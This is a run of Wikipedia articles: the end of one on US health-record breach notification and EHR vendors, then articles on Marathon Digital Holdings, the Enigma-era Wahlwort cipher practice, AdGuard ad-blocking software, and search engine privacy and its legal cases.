could have triggered a notice even though notice was not required by the HIPAA Security Rule. Since 1 January 2009, California residents are required to receive notice of a health information breach. Federal law and regulations now provide rights to notice of a breach of health information. The Health Information Technology for Economic and Clinical Health (HITECH) Act requires HHS and the Federal Trade Commission (FTC) to jointly study and report on privacy and data security of personal health information. HITECH also requires the agencies to issue breach notification rules that apply to HIPAA covered entities and Web-based vendors that store health information electronically. The FTC has adopted rules regarding breach notification for internet-based vendors. Vendors Vendors often focus on software for specific healthcare providers, including acute hospitals or ambulatory care. In the hospital market, Epic, Cerner, MEDITECH, and CSPI (Evident Thrive) had the top market share at 28%, 26%, 9%, and 6% in 2018. For large hospitals with over 500 beds, Epic and Cerner had over 85% market share in 2019. In ambulatory care, Practice Fusion had the highest satisfaction, while in acute hospital care Epic scored relatively well. Interoperability is a focus for systems; in 2018, Epic and athenahealth were rated highly for interoperability. Interoperability has been lacking, but is enhanced by certain compatibility features (e.g., Epic interoperates with itself via CareEverywhere) or in some cases regional or national networks, such as EHealth Exchange, CommonWell Health Alliance, and Carequality. Vendors may use anonymized data for their own business or research purposes; for example, as of 2019 Cerner and AWS partnered using data for a machine learning tool. History As of 2006, systems with a computerized provider order entry (CPOE) had existed for more than 30 years, but by 2006 only 10% of hospitals had a fully integrated system. See also iMedicor Electronic health record References Healthcare in the United States Electronic health records
58812518
https://en.wikipedia.org/wiki/Marathon%20Digital%20Holdings
Marathon Digital Holdings
Marathon Digital Holdings, Inc. is a digital asset technology company, which engages in mining cryptocurrencies, with a focus on the blockchain ecosystem and the generation of digital assets. The company was founded on February 23, 2010 and is headquartered in Las Vegas, NV. The company was formerly known as Marathon Patent Group and was the patent holding company that is the parent of Uniloc, allegedly a patent troll company. Marathon purchased patents related to encryption in the 2010s and in 2021 it was known for its purchases of bitcoin and bitcoin mining equipment and a joint venture to use 37 MW from the Hardin Generating Station Montana coal plant to power an adjacently-constructed Marathon bitcoin data center. The company changed its name to Marathon Digital Holdings, effective March 1, 2021. Its chief executive officer is Fred Thiel. Subsidiaries Marathon has several subsidiaries: See also Uniloc v. Microsoft Uniloc References Companies listed on the Nasdaq Patent monetization companies of the United States
58926597
https://en.wikipedia.org/wiki/Wahlwort
Wahlwort
Wahlwort (nonsense word or filler) is a cryptographic term used particularly in connection with the Wehrmacht, which used wahlworts on their Enigma rotor machine in the encryption of their communication in World War II. The term describes a randomly selected word which was inserted at the beginning or end of the radiogram plaintext. The wahlwort was intended to hinder the enemy’s cryptanalysis and prevent the decryption of the ciphertext. Application According to the secret regulations in force at that time, outlined in Der Schlüssel M - Verfahren M Allgemein (The Cipher M − M General Procedure), this procedure was used primarily to give radio messages different lengths (“Cipher M” refers to the Enigma M4, naval variant of the series of Enigma machines). Indeed, plaintexts with the same content often had to be transmitted to different receiving operators in their encrypted form. To do so they were encrypted with different keys corresponding to the different encryption networks. This resulted in ciphertexts that were different, yet had the same length. If the enemy noticed different ciphertexts of a similar length at approximately the same time, possibly from the same transmitting operator, the receiving operator would assume that a known-ciphertext-attack was taking place. The British Codebreakers from the English Bletchley Park (B. P.) were familiar with such cases and glad to receive them, naming this a kiss. Such a kiss was considered as an ideal opportunity to decipher radio messages, even better than a “Crib,” a deciphered text section. By introducing wahlworts of different lengths at the beginning or the end of the sentence, sometimes both the beginning and the end, the length of the messages differ, which prevented or at least hindered the enemy from accessing it. The length of a wahlwort was usually between four and fourteen letters. The German code book gave as examples; “Wassereimer (bucket), Fernsprecher (telephone), Eichbaum (oak tree), Dachfirst (roof ridge), Kleiderschrank (wardrobe).” Wahlworts with only three letters occasionally appeared in the code, such as ABC or XXX, but also very long compounds, such as Donaudampfschiffahrtsgesellschaftskapitän (Danube steamboating association captain) or Hottentottenpotentatentantenattentäter (Hottentot potentate aunt assassin ). The rationale for choosing more or less meaningful German words as wahlworts (specifically compound nouns) as opposed to random text such as CIHJT UUHML, was so that the authorized recipient could verify that their deciphering of the radio message was error-free. However, according to regulations, wahlworts were required to be entirely unrelated to the content of the actual radio message, and to not “infringe on discipline and order.” Wahlworts were also used in conjunction with other ciphering machines such as the Geheimschreiber (secret teleprinter) Siemens & Halske T52. “Introduced in 1940 on a wholesale scale, wahlworts might have knocked out the infant Crib Room before it had got properly on its feet.” Results The introduction of wahlworts, which was first observed by the British in 1942 in North Africa, impeded the codebreaker's work. However, at that time the British were so well acquainted with the German methods that there was no stopping their continued success in code-breaking, despite the wahlworts. It was a nuisance for them to have to try out the various possibilities pertaining to the word order of the text when they did not know the length of the wahlworts, but this could not stop them from deciphering the text. Post-war British review of the German wahlwort method revealed the practice to be "too little and too late". As with other German measures attempting to strengthen the cryptographic security of Enigma, for example the introduction of the cryptographically strong methods of the Enigma Uhr (clock), or the pluggable UKW D (nick-named Uncle Dick by the British), wahlworts failed because they were not introduced comprehensively and were adopted too late in the war. Literature John Jackson: Solving Enigma’s Secrets – The Official History of Bletchley Park’s Hut 6. BookTower Publishing 2014, pp 211–216, Tony Sale: The Bletchley Park 1944 Cryptographic Dictionary. Publikation, Bletchley Park, 2001, p 93, PDF; 0,4 MB, abgerufen am 24. August 2018. External links Der Schlüssel M (German) The Cipher M (PDF; 3,3 MB), Scan of the German original regulations from 1940, accessed on 23. August 2018. The 1944 Bletchley Park Cryptographic Dictionary “Wahlwort” in a B.P. cryptographic dictionary, accessed on 23. August 2018. References Enigma machine Classical ciphers
58934925
https://en.wikipedia.org/wiki/AdGuard
AdGuard
AdGuard Software Limited develops ad blocking and privacy protection software. Some of AdGuard's products are open-source, some are free, and some are shareware. AdGuard's DNS app supports Microsoft Windows, Linux, macOS, Android and iOS. AdGuard is also available as a browser extension. AdGuard Software Limited was founded in 2009 in Moscow. In 2014 the company was incorporated in Cyprus and subsequently moved its headquarters there. Products AdGuard products include: AdGuard Home AdGuard Home acts as a recursive DNS resolver, which responds with an invalid address for domains that appear in its filter lists quests. It is similar to Pi-hole. AdGuard Browser extensions The browser extension blocks video ads, interstitial ads, floating ads, pop-ups, banners, and text ads. There is a possibility to handle anti-AdBlock scripts. The product also blocks spyware and warns users of malicious websites. AdGuard Content Blocker is an additional browser extension for browsers Yandex Browser and Samsung Internet, which uses Content Blocker API. It downloads filter list updates and asks browsers to enforce them via Content Blocker API. AdGuard applications AdGuard has Windows and Mac versions, as well as native mobile versions for Android and iOS. The application sets up a local VPN, which filters all traffic on the mobile device. AdGuard DNS AdGuard hosts free public DNS servers. Some of these servers provide DNS-level network filtering for blocking domains used for delivering advertisement, online tracking, analytics. The product supports encryption technologies, including DNSCrypt, DNS over HTTPS, DNS over TLS and DNS-over-QUIC. AdGuard DNS also comes with an optional "Family Protection" mode for blocking access to websites with adult content as well as enforcing safe search in search engines. AdGuard began testing DNS service back in 2016, and officially launched it in 2018. Reception While the company's products have earned positive feedback in industry publications, a series of policies by Google and Apple app stores occurred in 2014 - 2018, which impeded user access to AdGuard's mobile applications. Macworld mentioned AdGuard for iOS in a list of five "best adblockers for iOS". In April 2020, Android Central stated that AdGuard uses "a little more processing power to do its thing than uBlock Origin", but it is "the best all-in-one blocking tool for someone who doesn't want to use more than one extension" because it blocks cryptomining. However, Android Central recommended uBlock Origin with a dedicated cryptomining blocker over AdGuard. Research AdGuard developers have taken up research in order to inform wider audiences on user privacy, cybersecurity and data protection. The following issues are notable cases involving the developers: Top-ranked websites involved in cryptojacking Facebook Ad Network widespread distribution Fake adblockers Popular Android and iOS app privacy issues Incidents Distribution of AdGuard for Android was discontinued by Google Play at the end of 2014. It nevertheless is still being updated and has been made available for download from the developers’ own website. AdGuard for iOS has not been updated since the summer of 2018 due to Apple policies against ad blocking, though it was still present in the Apple App Store. In summer 2019, access to the updates of AdGuard's earlier edition for iOS was restored. In September 2018, AdGuard was hit by credential stuffing attack. AdGuard claims that their servers were not compromised and instead attackers used credential pairs reused by victims on other sites and stolen from those other sites. According to company spokesperson, they "do not know what accounts exactly were accessed by the attackers", so the company had reset passwords for all accounts "as a precautionary measure". Also, AdGuard pledged to use "Have I Been Pwned?" API to check all new passwords for appearance in known public data leaks. Furthermore, they implemented a more strict password security requirements. In November 2020, Microsoft Edge Store was infiltrated with fraudulent add-ons resembling add-ons for AdGuard VPN and few security products. References Ad blocking software Android (operating system) software IOS software Privacy software 2009 software Free and open-source software Shareware
59012195
https://en.wikipedia.org/wiki/Search%20engine%20privacy
Search engine privacy
Search engine privacy is a subset of internet privacy that deals with user data being collected by search engines. Both types of privacy fall under the umbrella of information privacy. Privacy concerns regarding search engines can take many forms, such as the ability for search engines to log individual search queries, browsing history, IP addresses, and cookies of users, and conducting user profiling in general. The collection of personally identifiable information (PII) of users by search engines is referred to as "tracking". This is controversial because search engines often claim to collect a user's data in order to better tailor results to that specific user and to provide the user with a better searching experience. However, search engines can also abuse and compromise its users' privacy by selling their data to advertisers for profit. In the absence of regulations, users must decide what is more important to their search engine experience: relevance and speed of results or their privacy, and choose a search engine accordingly. The legal framework for protecting user privacy is not very solid. The most popular search engines collect personal information, but other search engines that are focused on privacy have cropped up recently. There have been several well publicized breaches of search engine user privacy that occurred with companies like AOL and Yahoo. For individuals interested in preserving their privacy, there are options available to them, such as using software like Tor which makes the user's location and personal information anonymous or using a privacy focused search engine. Privacy policies Search engines generally publish privacy policies to inform users about what data of theirs may be collected and what purposes it may be used for. While these policies may be an attempt at transparency by search engines, many people never read them and are therefore unaware of how much of their private information, like passwords and saved files, are collected from cookies and may be logged and kept by the search engine. This ties in with the phenomenon of notice and consent, which is how many privacy policies are structured. Notice and consent policies essentially consist of a site showing the user a privacy policy and having them click to agree. This is intended to let the user freely decide whether or not to go ahead and use the website. This decision, however, may not actually be made so freely because the costs of opting out can be very high. Another big issue with putting the privacy policy in front of users and having them accept quickly is that they are often very hard to understand, even in the unlikely case that a user decides to read them. Privacy minded search engines, such as DuckDuckGo, state in their privacy policies that they collect much less data than search engines such as Google or Yahoo, and may not collect any. As of 2008, search engines were not in the business of selling user data to third parties, though they do note in their privacy policies that they comply with government subpoenas. Google and Yahoo Google, founded in 1998, is the most widely used search engine, receiving billions and billions of search queries every month. Google logs all search terms in a database along with the date and time of search, browser and operating system, IP address of user, the Google cookie, and the URL that shows the search engine and search query. The privacy policy of Google states that they pass user data on to various affiliates, subsidiaries, and "trusted" business partners. Yahoo, founded in 1995, also collects user data. It is a well-known fact that users do not read privacy policies, even for services that they use daily, such as Yahoo! Mail and Gmail. This persistent failure of consumers to read these privacy policies can be disadvantageous to them because while they may not pick up on differences in the language of privacy policies, judges in court cases certainly do. This means that search engine and email companies like Google and Yahoo are technically able to keep up the practice of targeting advertisements based on email content since they declare that they do so in their privacy policies. A study was done to see how much consumers cared about privacy policies of Google, specifically Gmail, and their detail, and it determined that users often thought that Google's practices were somewhat intrusive but that users would not often be willing to counteract this by paying a premium for their privacy. DuckDuckGo DuckDuckGo, founded in 2008, claims to be privacy focused. DuckDuckGo does not collect or share any personal information of users, such as IP addresses or cookies, which other search engines usually do log and keep for some time. It also does not have spam, and protects user privacy further by anonymizing search queries from the website the user chooses and using encryption. Similarly privacy oriented search engines include Startpage and Disconnect. Types of data collected by search engines Most search engines can, and do, collect personal information about their users according to their own privacy policies. This user data could be anything from location information to cookies, IP addresses, search query histories, click-through history, and online fingerprints. This data is often stored in large databases, and users may be assigned numbers in an attempt to provide them with anonymity. Data can be stored for an extended period of time. For example, the data collected by Google on its users is retained for up to 9 months. Some studies state that this number is actually 18 months. This data is used for various reasons such as optimizing and personalizing search results for users, targeting advertising, and trying to protect users from scams and phishing attacks. Such data can be collected even when a user is not logged in to their account or when using a different IP address by using cookies. Uses User profiling and personalization What search engines often do once they have collected information about a user's habits is to create a profile of them, which helps the search engine decide which links to show for different search queries submitted by that user or which ads to target them with. An interesting development in this field is the invention of automated learning, also known as machine learning. Using this, search engines can refine their profiling models to more accurately predict what any given user may want to click on by doing A/B testing of results offered to users and measuring the reactions of users. Companies like Google, Netflix, YouTube, and Amazon have all started personalizing results more and more. One notable example is how Google Scholar takes into account the publication history of a user in order to produce results it deems relevant. Personalization also occurs when Amazon recommends books or when IMDb suggests movies by using previously collected information about a user to predict their tastes. For personalization to occur, a user need not even be logged into their account. Targeted advertising The internet advertising company DoubleClick, which helps advertisers target users for specific ads, was bought by Google in 2008 and was a subsidiary until June 2018, when Google rebranded and merged DoubleClick into its Google Marketing Platform. DoubleClick worked by depositing cookies on user's computers that would track sites they visited with DoubleClick ads on them. There was a privacy concern when Google was in the process of acquiring DoubleClick that the acquisition would let Google create even more comprehensive profiles of its users since they would be collecting data about search queries and additionally tracking websites visited. This could lead to users being shown ads that are increasingly effective with the use of behavioral targeting. With more effective ads comes the possibility of more purchases from consumers that they may not have made otherwise. In 1994, a conflict between selling ads and relevance of results on search engines began. This was sparked by the development of the cost-per-click model, which challenged the methods of the already-created cost-per-mille model. The cost-per-click method was directly related to what users searched, whereas the cost-per-mille method was directly influenced by how much a company could pay for an ad, no matter how many times people interacted with it. Improving search quality Besides ad targeting and personalization, Google also uses data collected on users to improve the quality of searches. Search result click histories and query logs are crucial in helping search engines optimize search results for individual users. Search logs also help search engines in the development of the algorithms they use to return results, such as Google's well known PageRank. An example of this is how Google uses databases of information to refine Google Spell Checker. Privacy organizations There are many who believe that user profiling is a severe invasion of user privacy, and there are organizations such as the Electronic Privacy Information Center (EPIC) and Privacy International that are focused on advocating for user privacy rights. In fact, EPIC filed a complaint in 2007 with the Federal Trade Commission claiming that Google should not be able to acquire DoubleClick on the grounds that it would compromise user privacy. Users' perception of privacy Experiments have been done to examine consumer behavior when given information on the privacy of retailers by integrating privacy ratings with search engines. Researchers used a search engine for the treatment group called Privacy Finder, which scans websites and automatically generates an icon to show the level of privacy the site will give the consumer as it compares to the privacy policies that consumer has specified that they prefer. The results of the experiment were that subjects in the treatment group, those who were using a search engine that indicated privacy levels of websites, purchased products from websites that gave them higher levels of privacy, whereas the participants in the control groups opted for the products that were simply the cheapest. The study participants also were given financial incentive because they would get to keep leftover money from purchases. This study suggests that since participants had to use their own credit cards, they had a significant aversion to purchasing products from sites that did not offer the level of privacy they wanted, indicating that consumers value their privacy monetarily. Ethical debates Many individuals and scholars have recognized the ethical concerns regarding search engine privacy. Pro data collection The collection of user data by search engines can be viewed as a positive practice because it allows the search engine to personalize results. This implies that users would receive more relevant results, and be shown more relevant advertisements, when their data, such as past search queries, location information, and clicks, is used to create a profile for them. Also, search engines are generally free of charge for users and can remain afloat because one of their main sources of revenue is advertising, which can be more effective when targeted. Anti-data collection This collection of user data can also be seen as an overreach by private companies for their own financial gain or as an intrusive surveillance tactic. Search engines can make money using targeted advertising because advertisers are willing to pay a premium to present their ads to the most receptive consumers. Also, when a search engine collects and catalogs large amounts of data about its users, there is the potential for it to be leaked accidentally or breached. The government can also subpoena user data from search engines when they have databases of it. Search query database information may also be subpoenaed by private litigants for use in civil cases, such as divorces or employment disputes. Data and privacy breaches AOL search data leak One major controversy regarding search engine privacy was the AOL search data leak of 2006. For academic and research purposes, AOL made public a list of about 20 million search queries made by about 650,000 unique users. Although they assigned unique identification numbers to the users instead of attaching names to each query, it was still possible to ascertain the true identities of many users simply by analyzing what they had searched, including locations near them and names of friends and family members. A notable example of this was how the New York Times identified Thelma Arnold through "reverse searching". Users also sometimes do "ego searches" where they search themselves to see what information about them is on the internet, making it even easier to identify supposedly anonymous users. Many of the search queries released by AOL were incriminating or seemingly extremely private, such as "how to kill your wife" and "can you adopt after a suicide attempt". This data has since been used in several experiments that attempt to measure the effectiveness of user privacy solutions. Google and Yahoo Both Google and Yahoo were subjects of a Chinese hack in 2010. While Google responded to the situation seriously by hiring new cybersecurity engineers and investing heavily into securing user data, Yahoo took a much more lax approach. Google started paying hackers to find vulnerabilities in 2010 while it took Yahoo until 2013 to follow suit. Yahoo was also identified in the Snowden data leaks as a common hacking target for spies of various nations, and Yahoo still did not give its newly hired chief information security officer the resources to really effect change within the company. In 2012, Yahoo hired Marissa Mayer, previously a Google employee, to be the new CEO, but she chose not to invest much in the security infrastructure of Yahoo and went as far as to refuse the implementation of a basic and standard security measure to force the reset of all passwords after a breach. Yahoo is known for being the subject of multiple breaches and hacks that have compromised large amounts of user data. As of late 2016, Yahoo had announced that at least 1.5 billion user accounts had been breached during 2013 and 2014. The breach of 2013 compromised over a billion accounts while the breach of 2014 included about 500 million accounts. The data compromised in the breaches included personally identifiable information such as phone numbers, email addresses, and birth dates as well as information like security questions (used to reset passwords) and encrypted passwords. Yahoo made a statement saying that their breaches were a result of state sponsored actors, and in 2017, two Russian intelligence officers were indicted by the United States Department of Justice as part of a conspiracy to hack Yahoo and steal user data. As of 2016, the Yahoo breaches of 2013 and 2014 were the largest of all time. In October 2018, there was a Google+ data breach that potentially affected about 500,000 accounts which led to the shutdown of the Google+ platform. Government subpoenas of data The government may want to subpoena user data from search engines for any number of reasons, which is why it a big threat to user privacy. In 2006, they wanted it as part of their defense of COPA, and only Google refused to comply. While protecting the online privacy of children may be an honorable goal, there are concerns about whether the government should have access to such personal data to achieve it. At other times, they may want it for national security purposes; access to big databases of search queries in order to prevent terrorist attacks is a common example of this. Whatever the reason, it is clear that the fact that search engines do create and maintain these databases of user data is what makes it possible for the government to access it. Another concern regarding government access to search engine user data is "function creep", a term that here refers to how data originally collected by the government for national security purposes may eventually be used for other purposes, such as debt collection. This would indicate to many a government overreach. While protections for search engine user privacy have started developing recently, the government has increasingly been on the side that wants to ensure search engines retain data, making users less protected and their data more available for anyone to subpoena. Methods for increasing privacy Switching search engines A different, although popular, route for a privacy centered user to take is to simply start using a privacy oriented search engine, such as DuckDuckGo. This search engine maintains the privacy of its users by not collecting data on or tracking its users. While this may sound simple, users must take into account the trade-off between privacy and relevant results when deciding to switch search engines. Results to search queries can be very different when the search engine has no search history to aid it in personalization. Using privacy oriented browsers Mozilla is known for its beliefs in protecting user privacy on Firefox. Mozilla Firefox users have the capability to delete the tracking cookie that Google places on their computer, making it much harder for Google to group data. Firefox also has a button called "Clear Private Data", which allows users to have more control over their settings. Internet Explorer users have this option as well. When using a browser like Google Chrome or Safari, users also have the option to browse in "incognito" or "private browsing" modes respectively. When in these modes, the user's browsing history and cookies are not collected. Opting out The Google, Yahoo!, AOL, and MSN search engines all allow users to opt out of the behavioral targeting they use. Users can also delete search and browsing history at any time. The Ask.com search engine also has AskEraser, which, when used, purges user data from their servers. Deleting a user's profile and history of data from search engine logs also helps protect user privacy in the event a government agency wants to subpoena it. If there are no records, there is nothing the government can access. It is important to note that simply deleting your browsing history does not delete all the information the search engine has on you, some companies do not delete the data associated with your account when you clear your browsing history. For companies that do delete user data, they usually do not delete all of it keeping records of how you used the search engine. Social network solution An innovative solution, proposed by researchers Viejo and Castellà-Roca, is a social network solution whereby user profiles are distorted. In their plan, each user would belong to a group, or network, of people who all use the search engine. Every time somebody wanted to submit a search query, it would be passed on to another member of the group to submit on their behalf until someone submitted it. This would ideally lead to all search queries being divvied up equally between all members of the network. This way, the search engine cannot make a useful profile of any individual user in the group since it has no way to discern which query actually belonged to each user. Delisting and reordering After the Google Spain v. AEPD case, it was established that people had the right to request that search engines delete personal information from their search results in compliance with other European data protection regulations. This process of simply removing certain search results is called de-listing. While effective in protecting the privacy of those who wish information about them to not be accessed by anyone using a search engine, it does not necessarily protect the contextual integrity of search results. For data that is not highly sensitive or compromising, reordering search results is another option where people would be able to rank how relevant certain data is at any given point in time, which would then alter results given when someone searched their name. Anonymity networks A sort of DIY option for privacy minded users is to use a software like Tor, which is an anonymity network. Tor functions by encrypting user data and routing queries through thousands of relays. While this process is effective at masking IP addresses, it can slow the speed of results. While Tor may work to mask IP addresses, there have also been studies that show that a simulated attacker software could still match search queries to users even when anonymized using Tor. Unlinkability and indistinguishability Unlinkability and indistinguishability are also well-known solutions to search engine privacy, although they have proven somewhat ineffective in actually providing users with anonymity from their search queries. Both unlinkability and indistinguishability solutions try to anonymize search queries from the user who made them, therefore making it impossible for the search engine to definitively link a specific query with a specific user and create a useful profile on them. This can be done in a couple of different ways. Unlinkability Another way for the user to hide information such as their IP address from the search engine, which is an unlinkability solution. This is perhaps more simple and easy for the user because any user can do this by using a VPN, although it still does not guarantee total privacy from the search engine. Indistinguishability One way is for the user to use a plugin or software that generates multiple different search queries for every real search query the user makes. This is an indistinguishability solution, and it functions by obscuring the real searches a user makes so that a search engine cannot tell which queries are the software's and which are the user's. Then, it is more difficult for the search engine to use the data it collects on a user to do things like target ads. Legal rights and court cases Being that the internet and search engines are relatively recent creations, no solid legal framework for privacy protections in terms of search engines has been put in place. However, scholars do write about the implications of existing laws on privacy in general to inform what right to privacy search engine users have. As this is a developing field of law, there have been several lawsuits with respect to the privacy search engines are expected to afford to their users. United States The Fourth Amendment The Fourth Amendment is well known for the protections it offers citizens from unreasonable searches and seizures, but in Katz v. United States (1967), these protections were extended to cover intrusions of privacy of individuals, in addition to simply intrusion of property and people. Privacy of individuals is a broad term, but it is not hard to imagine that it includes the online privacy of an individual. The Sixth Amendment The Confrontation Clause of the Sixth Amendment is applicable to the protection of big data from government surveillance. The Confrontation Clause essentially states that defendants in criminal cases have the right to confront witnesses who provide testimonial statements. If a search engine company like Google gives information to the government to prosecute a case, these witnesses are the Google employees involved in the process of selecting which data to hand over to the government. The specific employees who must be available to be confronted under the Confrontation Clause are the producer who decides what data is relevant and provides the government with what they've asked for, the Google analyst who certifies the proper collection and transmission of data, and the custodian who keeps records. The data these employees of Google curate for trial use is then thought of as testimonial statement. The overall effectiveness of the Confrontation Clause on search engine privacy is that it places a check on how the government can use big data and provides defendants with protection from human error. Katz v. United States This 1967 case is prominent because it established a new interpretation of privacy under the Fourth Amendment, specifically that people had a reasonable expectation of it. Katz v. United States was about whether or not it was constitutional for the government to listen to and record, electronically using a pen register, a conversation Katz had from a public phone booth. The court ruled that it did violate the Fourth Amendment because the actions of the government were considered a "search" and that the government needed a warrant. When thinking about search engine data collected about users, the way telephone communications were classified under Katz v. United States could be a precedent for how it should be handled. In Katz v. United States, public telephones were deemed to have a "vital role" in private communications. This case took place in 1967, but surely nowadays, the internet and search engines have this vital role in private communications, and people's search queries and IP addresses can be thought of as analogous to the private phone calls placed from public booths. United States v. Miller This 1976 Supreme Court case is relevant to search engine privacy because the court ruled that when third parties gathered or had information given to them, the Fourth Amendment was not applicable. Jayni Foley argues that the ruling of United States v. Miller implies that people cannot have an expectation of privacy when they provide information to third parties. When thinking about search engine privacy, this is important because people willingly provide search engines with information in the form of their search queries and various other data points that they may not realize are being collected. Smith v. Maryland In the Supreme Court case Smith v. Maryland of 1979, the Supreme Court went off the precedent set in the 1976 United States v. Miller case about assumption of risk. The court ruled that the Fourth Amendment did not prevent the government from monitoring who dialed which phone numbers by using a pen register because it did not qualify as a "search". Both the United States v. Miller and the Smith v. Maryland cases have been used to prevent users from the privacy protections offered under the Fourth Amendment from the records that internet service providers (ISPs) keep. This is also articulated in the Sixth Circuit Guest v. Leis case as well as the United States v. Kennedy case where the courts ruled that Fourth Amendment protections did not apply to ISP customer data since they willingly provided ISPs with their information just by using the services of ISPs. Similarly, the current legal structure regarding privacy and assumption of risk can be interpreted to mean that users of search engines cannot expect privacy in regards to the data they communicate by using search engines. Electronic Communication Privacy Act The Electronic Communications Privacy Act (ECPA) of 1986 was passed by Congress in an effort to start creating a legal structure for privacy protections in the face of new forms of technologies, although it was by no means comprehensive because there are considerations for current technologies that Congress never imagined in 1986 and could account for. The EPCA does little to regulate ISPs and mainly prevents government agencies from gathering information stored by ISPs without a warrant. What the EPCA does not do, unsurprisingly because it was enacted before internet usage became a common occurrence, is say anything about search engine privacy and the protections users are afforded in terms of their search queries. Gonzales v. Google Inc. The background of this 2006 case is that the government was trying to bolster its defense for the Child Online Protection Act (COPA). It was doing a study to see how effective its filtering software was in regards to child pornography. To do this, the government subpoenaed search data from Google, AOL, Yahoo!, and Microsoft to use in its analysis and to show that people search information that is potentially compromising to children. This search data that the government wanted included both the URLs that appeared to users and the actual search queries of users. Of the search engines the government subpoenaed to produce search queries and URLs, only Google refused to comply with the government, even after the request was reduced in size. Google itself claimed that handing over these logs was to hand over personally identifiable information and user identities. The court ruled that Google had to hand over 50,000 randomly selected URLs to the government but not search queries because that could seed public distrust of the company and therefore compromise its business. Law of Confidentiality While not a strictly defined law enacted by Congress, the Law of Confidentiality is common law that protects information shared by a party who has trust and an expectation of privacy from the party they share the information with. If the content of search queries and the logs they are stored in is thought of in the same manner as information shared with a physician, as it is similarly confidential, then it ought to be afforded the same privacy protections. Europe Google Spain v. AEPD The European Court of Justice ruled in 2014 that its citizens had the "Right to Be Forgotten" in the Google Spain SL v. Agencia Española de Protección de Datos case, which meant that they had the right to demand search engines wipe any data collected on them. While this single court decision did not directly establish the "right to be forgotten", the court interpreted existing law to mean that people had the right to request that some information about them be wiped from search results provided by search engine companies like Google. The background of this case is that one Spanish citizen, Mario Costeja Gonzalez, set out to erase himself from Google's search results because they revealed potentially compromising information about his past debts. In the ruling in favor of Mario Costeja Gonzalez, the court noted that search engines can significantly impact the privacy rights of many people and that Google controlled the dissemination of personal data. This court decision did not claim that all citizens should be able to request that information about them be completely wiped from Google at any time, but rather that there are specific types of information, particularly information that is obstructing one's right to be forgotten, that do not need to be so easily accessible on search engines. General Data Protection Regulation (GDPR) The GDPR is a European regulation that was put in place to protect data and provide privacy to European citizens, regardless of whether they are physically in the European Union. This means that countries around the globe have had to comply with their rules so that any European citizen residing in them is afforded the proper protections. The regulation became enforceable in May 2018. See also References Data protection Internet privacy Internet search engines World Wide Web